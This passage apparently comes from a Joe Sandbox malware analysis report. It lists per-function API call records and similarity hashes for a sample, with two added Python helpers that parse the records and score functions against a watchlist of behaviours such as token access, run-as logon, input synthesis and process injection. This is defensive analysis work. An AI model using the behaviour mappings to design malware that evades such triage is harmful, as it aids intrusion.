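        raw_args = m.group("args")
        args = tuple(a.strip() for a in raw_args.split(",")) if raw_args else ()
        sub = m.group("sub")
        calls.append(ApiCall(api=m.group("api"), module=m.group("mod"), args=args,
                             ref=int(m.group("ref"), 16),
                             subcall_of=int(sub, 16) if sub else None))
    return calls


def resolved_name(call: ApiCall) -> str:
    """Map an ordinal import such as "#16" in WSOCK32 to its export name."""
    if call.api.startswith("#") and call.module.upper() == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(call.api[1:]), call.api)
    return call.api


def detect_behaviours(calls: List[ApiCall]) -> List[str]:
    """Labels whose whole API set appears in the function (subcalls included)."""
    seen = {resolved_name(c) for c in calls}
    return sorted(label for label, apis in BEHAVIOURS.items() if apis <= seen)


# Entries copied from this report's function listing.
SAMPLE_PROCESS = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00F41C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00F41C26
• __wsplitpath.LIBCMT ref: 00F41C54
  • Part of subcall function 00F01DFC: __wsplitpath_helper.LIBCMT ref: 00F01E3C
• _wcscat.LIBCMT ref: 00F41C69
• Process32NextW.KERNEL32(00000000,?), ref: 00F41CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00F41CF1
"""

SAMPLE_REGISTRY = """\
  • Part of subcall function 00F43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F430AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F430EF
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F43112
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F4313B
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F4317E
• RegCloseKey.ADVAPI32(00000000), ref: 00F4318B
"""

SAMPLE_SOCKET = """\
• select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00F7DC00), ref: 00F38E7C
• WSAGetLastError.WSOCK32(00000000), ref: 00F38E89
• __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00F38EAD
• #16.WSOCK32(?,?,00000000,00000000), ref: 00F38EC5
• _strlen.LIBCMT ref: 00F38EF7
• WSAGetLastError.WSOCK32(00000000), ref: 00F38F6A
"""

if __name__ == "__main__":
    for name, sample in (("process", SAMPLE_PROCESS), ("registry", SAMPLE_REGISTRY),
                         ("socket", SAMPLE_SOCKET)):
        calls = parse_api_block(sample)
        print(name, [hex(c.ref) for c in calls], detect_behaviours(calls))
```

Matching on complete API sets rather than single names keeps noise down: a lone RegCloseKey or CloseHandle says nothing, whereas the snapshot/first/next triple is the unambiguous Toolhelp32 walk. Calls marked "Part of subcall function" are included in the set because the behaviour is reachable from this function even though the call site is in a callee.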
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 00F48540
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00F48577
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F4859F
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00F4860E
                                                                                        • GetSubMenu.USER32(?,?), ref: 00F4861C
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F4866D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: 4a9277880145a39af9f83b00db793894110041d3fcb678ba626923f0a0f11544
                                                                                        • Instruction ID: 1606ecae4a6d7e73d54029498fa67a9a5373425e56065e87805f5cd6b77bba08
                                                                                        • Opcode Fuzzy Hash: 4a9277880145a39af9f83b00db793894110041d3fcb678ba626923f0a0f11544
                                                                                        • Instruction Fuzzy Hash: CA51BF31E00218AFCF11EF64C941AAEBBF4EF48760F154459ED15B7391CB74AE419B90
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F24B10
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F24B5B
                                                                                        • IsMenu.USER32(00000000), ref: 00F24B7B
                                                                                        • CreatePopupMenu.USER32 ref: 00F24BAF
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00F24C0D
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F24C3E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: 3221e5ab726a1d1d2079460edafb563fdb5396634bf3bb979e419edb7b2172a2
                                                                                        • Instruction ID: 9d6bcbe37e313bcdfcfe8ffe130e950d283538de111d300898c0130076d201e7
                                                                                        • Opcode Fuzzy Hash: 3221e5ab726a1d1d2079460edafb563fdb5396634bf3bb979e419edb7b2172a2
                                                                                        • Instruction Fuzzy Hash: 9E51D270A01269DFCF20CF68E888BADBBF4EF44328F144159E425AB291D7F4A944EB51
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00F7DC00), ref: 00F38E7C
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38E89
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00F38EAD
                                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00F38EC5
                                                                                        • _strlen.LIBCMT ref: 00F38EF7
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38F6A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_strlenselect
                                                                                        • String ID:
                                                                                        • API String ID: 2217125717-0
                                                                                        • Opcode ID: a29fc214e366871d91b43c5c4f9dd3db06dfbcdd252414c4dc1145033ca8bb04
                                                                                        • Instruction ID: 0424a9bd997a32457e1d900e6a6eaf6fea438a2e9d70c55b9833f699079d6a17
                                                                                        • Opcode Fuzzy Hash: a29fc214e366871d91b43c5c4f9dd3db06dfbcdd252414c4dc1145033ca8bb04
                                                                                        • Instruction Fuzzy Hash: 0D41D471A00208AFCB14EFB4DD85EAEB7B9AF08360F104659F516A72D1DF74AE41DB60
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • BeginPaint.USER32(?,?,?), ref: 00EFAC2A
                                                                                        • GetWindowRect.USER32(?,?), ref: 00EFAC8E
                                                                                        • ScreenToClient.USER32(?,?), ref: 00EFACAB
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EFACBC
                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00EFAD06
                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F5E673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 2592858361-0
                                                                                        • Opcode ID: 136f8e9e40f70ed65f0b8ac560a05107aa6a9a3263b90574ec2838a8ae6b89e1
                                                                                        • Instruction ID: 80d1252a26ad7f7122f046602ebdec9ac2caba29f2540fe6660e9bc38449359a
                                                                                        • Opcode Fuzzy Hash: 136f8e9e40f70ed65f0b8ac560a05107aa6a9a3263b90574ec2838a8ae6b89e1
                                                                                        • Instruction Fuzzy Hash: EF41C6B15043099FC710DF14CC84FB77BE8FB59364F080669FAA89B2A1C7719944EB62
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00FA1628,00000000,00FA1628,00000000,00000000,00FA1628,?,00F5DC5D,00000000,?,00000000,00000000,00000000,?,00F5DAD1,00000004), ref: 00F4E40B
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00F4E42F
                                                                                        • ShowWindow.USER32(00FA1628,00000000), ref: 00F4E48F
                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 00F4E4A1
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 00F4E4C5
                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F4E4E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: b63b331078910b991984ca8d5949b07039c805478897298283eb107cfbc42b74
                                                                                        • Instruction ID: 95e5ad31548d36f8fb3cc91580a2d9a3ea574e91de786343ed9b6ecdd4953399
                                                                                        • Opcode Fuzzy Hash: b63b331078910b991984ca8d5949b07039c805478897298283eb107cfbc42b74
                                                                                        • Instruction Fuzzy Hash: D2416038A01144EFDB22CF24C499B947FE1BF19324F1981A9EE598F2B2C771E845EB51
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F298D1
                                                                                          • Part of subcall function 00EFF4EA: std::exception::exception.LIBCMT ref: 00EFF51E
                                                                                          • Part of subcall function 00EFF4EA: __CxxThrowException@8.LIBCMT ref: 00EFF533
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F29908
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00F29924
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00F2999E
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F299B3
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F299D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 2537439066-0
                                                                                        • Opcode ID: 133407d5a40f6b4e91bfa2daa871a696be87b67dbb7b458b5e2fac67bfd8da6d
                                                                                        • Instruction ID: 98d458552cbacc7c092d6744cb83e64bcc4a8ab47ab907b6bccb78f58f9d458a
                                                                                        • Opcode Fuzzy Hash: 133407d5a40f6b4e91bfa2daa871a696be87b67dbb7b458b5e2fac67bfd8da6d
                                                                                        • Instruction Fuzzy Hash: 90316131A00119ABDB109F95DC85E6EB7B8FF45710F1480A9F904AB256D774DE14DBA0
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00F377F4,?,?,00000000,00000001), ref: 00F39B53
                                                                                          • Part of subcall function 00F36544: GetWindowRect.USER32(?,?), ref: 00F36557
                                                                                        • GetDesktopWindow.USER32 ref: 00F39B7D
                                                                                        • GetWindowRect.USER32(00000000), ref: 00F39B84
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F39BB6
                                                                                          • Part of subcall function 00F27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27AD0
                                                                                        • GetCursorPos.USER32(?), ref: 00F39BE2
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F39C44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: dfb1f7c982fa401054743b64cfd6dba65a0627fd1edbc6e6d1b6120769383df3
                                                                                        • Instruction ID: 9937b65d9cf24bcc4be4a3e290778460d009bb87fbf0b1ab0a449c0199749446
                                                                                        • Opcode Fuzzy Hash: dfb1f7c982fa401054743b64cfd6dba65a0627fd1edbc6e6d1b6120769383df3
                                                                                        • Instruction Fuzzy Hash: 88310172A08319ABC710DF14DC49F9AB7EDFF88324F00092AF595D7181DAB1EA04DB92
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F1AFAE
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F1AFB5
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F1AFC4
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00F1AFCF
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F1AFFE
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F1B012
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: b69a543f1c9eb25b806e62459becd09b2f3d160be253dc05881533a595c0e357
                                                                                        • Instruction ID: 0416ab0add50b562e3d5f69b40470606655a59c7f42c2fb002a1b66319d0c6b1
                                                                                        • Opcode Fuzzy Hash: b69a543f1c9eb25b806e62459becd09b2f3d160be253dc05881533a595c0e357
                                                                                        • Instruction Fuzzy Hash: 78214CB290520DABDB028FA4DD09BEE7BA9AB48314F044015FA01A2161C3B6DDA5FB61
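The function records on this page (the "APIs" list, the memory-dump source and the Similarity hashes) are raw per-function output, and the routine just above, which opens the current process token, builds an environment block for it and calls CreateProcessWithLogonW, is the kind of record an analyst wants surfaced ahead of the GDI paint and path routines around it. The following Python is an added example, not Joe Sandbox code and not part of this report: it parses records in exactly the format shown here (the embedded excerpt is a constructed, abridged copy of three records from this page), separates direct calls from "Part of subcall function" calls, and ranks each function by a watchlist of Win32 APIs. The watchlist weights and behaviour tags are assumptions chosen for illustration.

```python
"""
Triage helper for the per-function disassembly records of a Joe Sandbox
report. Added example, not code from Joe Sandbox or from this report.
It parses "APIs" / "Similarity" records in the page's format and ranks the
functions by watchlisted Win32 API calls.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# One API line of a record, in the three shapes seen in the report:
#   • OpenProcessToken.ADVAPI32(00000000), ref: 00F1AFB5
#   • Part of subcall function 00F27A58: Sleep.KERNEL32(?), ref: 00F27AD0
#   • GetDesktopWindow.USER32 ref: 00F39B7D          (no argument list)
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<api>[\w@:]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)\s*$"
)

# Watchlist (assumption for this example): API name -> (weight, behaviour tag).
WATCHLIST = {
    "OpenProcessToken": (3, "token-access"),
    "CreateProcessWithLogonW": (5, "run-as-credentials"),
    "CreateEnvironmentBlock": (1, "run-as-credentials"),
    "mouse_event": (3, "input-synthesis"),
    "MapVirtualKeyW": (2, "input-synthesis"),
    "GetProcAddress": (1, "dynamic-api-resolution"),
    "IsDebuggerPresent": (3, "anti-debug"),
    "WriteProcessMemory": (5, "process-injection"),
}

# Constructed, abridged excerpt of three records from this page.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F1AFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 00F1AFB5
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F1AFC4
• CloseHandle.KERNEL32(00000004), ref: 00F1AFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F1AFFE
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00F1B012
Memory Dump Source
Similarity
• Opcode ID: b69a543f1c9eb25b806e62459becd09b2f3d160be253dc05881533a595c0e357
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00F377F4,?,?,00000000,00000001), ref: 00F39B53
• GetDesktopWindow.USER32 ref: 00F39B7D
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F39BB6
  • Part of subcall function 00F27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27AD0
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F39C44
Memory Dump Source
Similarity
• Opcode ID: dfb1f7c982fa401054743b64cfd6dba65a0627fd1edbc6e6d1b6120769383df3
APIs
  • Part of subcall function 00EFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EFAFE3
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F4EC20
• LineTo.GDI32(00000000,00000003,?), ref: 00F4EC34
• StrokePath.GDI32(00000000), ref: 00F4EC72
Memory Dump Source
Similarity
• Opcode ID: 4ddf65da56d601af68e6596126ec1ef9919224180234e8f0b8d6e0ea814fdce3
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: str
    ref: str
    subcall: str | None  # callee address when the call sits in a subcall, else None


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    calls: list[ApiCall] = field(default_factory=list)


def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into one FunctionRecord per 'APIs' header."""
    records: list[FunctionRecord] = []
    in_apis = False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append(FunctionRecord())
            in_apis = True
            continue
        if not records:
            continue
        if line.startswith("• Opcode ID:"):
            records[-1].opcode_id = line.split(":", 1)[1].strip()
            in_apis = False
            continue
        if in_apis:
            m = API_LINE.match(line)
            if m:
                records[-1].calls.append(ApiCall(m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
            else:
                in_apis = False  # reached "Memory Dump Source" or another header
    return records


def triage(records: list[FunctionRecord]) -> list[tuple[FunctionRecord, float, list[str]]]:
    """Score records by watchlisted calls; a call reached only via a subcall counts half."""
    ranked = []
    for rec in records:
        score, tags = 0.0, set()
        for c in rec.calls:
            if c.api in WATCHLIST:
                weight, tag = WATCHLIST[c.api]
                score += weight if c.subcall is None else weight / 2
                tags.add(tag)
        ranked.append((rec, score, sorted(tags)))
    ranked.sort(key=lambda t: t[1], reverse=True)
    return ranked


def summarize(text: str) -> list[tuple[str, float, list[str]]]:
    """Ranked (opcode-id prefix, score, tags) triples, highest score first."""
    return [(rec.opcode_id[:12], score, tags) for rec, score, tags in triage(parse_records(text))]


if __name__ == "__main__":
    for opcode_prefix, score, tags in summarize(SAMPLE):
        print(f"{opcode_prefix}  score={score:<4} {', '.join(tags) or '-'}")
```

Run against a whole report, the ranking puts the token/run-as routine first, the mouse_event routine second and the GDI path routine last; subcall lines are kept but weighted lower because they describe a callee, not the function whose record they appear in.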
                                                                                        APIs
                                                                                          • Part of subcall function 00EFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EFAFE3
                                                                                          • Part of subcall function 00EFAF83: SelectObject.GDI32(?,00000000), ref: 00EFAFF2
                                                                                          • Part of subcall function 00EFAF83: BeginPath.GDI32(?), ref: 00EFB009
                                                                                          • Part of subcall function 00EFAF83: SelectObject.GDI32(?,00000000), ref: 00EFB033
                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F4EC20
                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00F4EC34
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F4EC42
                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00F4EC52
                                                                                        • EndPath.GDI32(00000000), ref: 00F4EC62
                                                                                        • StrokePath.GDI32(00000000), ref: 00F4EC72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                        • String ID:
                                                                                        • API String ID: 43455801-0
                                                                                        • Opcode ID: 4ddf65da56d601af68e6596126ec1ef9919224180234e8f0b8d6e0ea814fdce3
                                                                                        • Instruction ID: 71d92668da13d86aebc64018d963816658edbdfe7eb5b68e52d4dee12e2d8762
                                                                                        • Opcode Fuzzy Hash: 4ddf65da56d601af68e6596126ec1ef9919224180234e8f0b8d6e0ea814fdce3
                                                                                        • Instruction Fuzzy Hash: 49111B7250014DBFEF029F90DD88EEA7F6DEB08360F048122FE189A160D7B19D55EBA0
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00F1E1C0
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F1E1D1
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F1E1D8
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00F1E1E0
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F1E1F7
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00F1E209
                                                                                          • Part of subcall function 00F19AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00F19A05,00000000,00000000,?,00F19DDB), ref: 00F1A53A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                        • String ID:
                                                                                        • API String ID: 603618608-0
                                                                                        • Opcode ID: e69ac34bc81bd834bcfae5faa6db87ce48b1df14c7c1f998f235534c71270e9b
                                                                                        • Instruction ID: 431e7a69309d201f96fd6cbfc635eed81552461985dae23f09182ad74c0e9e9f
                                                                                        • Opcode Fuzzy Hash: e69ac34bc81bd834bcfae5faa6db87ce48b1df14c7c1f998f235534c71270e9b
                                                                                        • Instruction Fuzzy Hash: 71018FB5F00218BFEB109BA6CC45B5EBFB8EB48351F004066EE04A7290D6B19C01DBA0
                                                                                        APIs
                                                                                        • __init_pointers.LIBCMT ref: 00F07B47
                                                                                          • Part of subcall function 00F0123A: __initp_misc_winsig.LIBCMT ref: 00F0125E
                                                                                          • Part of subcall function 00F0123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F07F51
